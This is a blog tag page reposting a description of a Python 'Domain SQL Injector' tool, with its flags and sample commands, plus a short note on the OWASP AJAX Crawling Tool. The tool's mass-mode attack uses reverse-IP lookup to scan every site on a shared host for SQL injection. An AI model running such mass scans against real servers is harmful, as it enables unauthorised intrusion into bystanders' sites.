'Crawling'에 해당되는 글 2건

  1. 2012.03.31 Domain SQL Injector - Find SQL Injection on all sites hosted on server
  2. 2012.01.06 OWASP AJAX Crawling Tool (update)
2012.03.31 23:56

Domain SQL Injector - Find SQL Injection on all sites hosted on server

Hey Guys,

Sharing a private python script - "Domain SQL Injector - Error Based SQLi Tool"

The script has following features:
1. Crawling : it can crawl all or requested number of pages on a website
2. Reverse IP Look Up : it can find all sites hosted on a shared hosting server
3. Single-Mode Attack : Crawl and find SQLi on single website and report
4. Mass-Mode Attack : Find all sites hosted on domain, crawl one-by-one, find SQLi on each one-by-one and report
5. Targets could be skipped while crawling if found too big or irrelevant. Though the script can not be paused but could be skipped to target next site.

The script was developed as part of a Penetration Test assessment where Mass-Mode attack was required per clients request.

The Banner

Code:
# ./Domain-SQLi-finder.py


Script Help

Code:
./Domain-SQLi-finder.py -h


Single-Mode Attack - Targeting Single Website

Code:
./Domain-SQLi-finder.py --verbose 1 --url demo.testfire.net --crawl 50 --pages 5 --output testfire-SQLi.txt

It crawls all or requested number of pages, finds injectable links, finds injecatable parameters and tests SQLi payloads against each injectable parameter


Mass-Mode Attack - Targeting whole domain


Code:
# ./Domain-SQLi-finder.py --verbose 1 --durl demo.testfire.net --crawl 50 --pages 5 --sites 4 --vulsites 2 --output testfire-SQLi.txt

It starts with reserver IP lookup, if requested, and finds all domains hosted on shared hosting server

Above you can see 3 domains were found hosted on single server

Further, script would target each domain one-by-one, crawling, and testing SQLi against them

Crawling....


Usage:

--verbose : Value 0 would display minimum messages required. Value 1 would display complete progress. By default, vebosity is OFF
--output : Output file name to hold final result. If not specified, default file with name DSQLiResults.txt will be created under same directory

Single-Mode Attack:
--url : takes URL as input
--crawl : Number of pages on website to crawl (default is set to 500). Chilkat library is used for crawling
--pages : Number of vulnerable pages (injectable parameters) to find on site (default is 0 i.e. try and find all possible vulnerable pages)

Mass-Mode Attack:
--durl : URL of domain
--sites : Number of sites to scan on domain. Default is 0 i.e scan all.
--vulsites : Number of vulnerable sites to find before scanning would stop automatically. Default is 0 i.e. try to find all vulnerable sites
--dcrawl : Number of pages on website to crawl (default is set to 500)
--dpages : Number of vulnerable pages to find on site. Default is 0 i.e. try and find all possible vulnerable pages.

--reverse : This option has dual role

- If specified on command prompt with output file name, script would consider that user has done Reverse-IP lookup already i.e. a file is existing under same directory which has result of reverse-IP lookup and script just needs to read the file. This has another benefit - script doesn't have to do reverse IP lookup whenever fired. Just generate it once and if quitting script in between while targeting domain, the next time user just needs to provide it amended reverseIP Lookup file i.e. remove the already scanned target urls from list.
- If this option is not specified on command prompt, the script would perform reverse-IP lookup itself



Script generates few more files during scanning which could be considered as log files, e.g. crawler output file, unique links parsed output file, reverse-IP lookup output file.


Cheers!

PS: Part of credit goes to fb1 for not coding the concept upto my requirements else I would not have coded it myself

Domain-SQLi-finder.py.txt
DomainReverseIPLookUp.py.txt


출처 : garage4hackers.com



Trackback 0 Comment 0
2012.01.06 18:44

OWASP AJAX Crawling Tool (update)

Enumerating AJAX Applications with ACT (AJAX Crawling Tool)




This demo shows how the AJAX Crawling Tool can be used in conjunction with your favorite proxy to fully enumerate and test AJAX applications. The purpose of the video is to:

1) Demonstrate how traditional spidering tools do not enumerate entire applications
2) How to run a basic ACT session and attacking it's findings using a proxy


출처 : owasp.org 

Trackback 0 Comment 0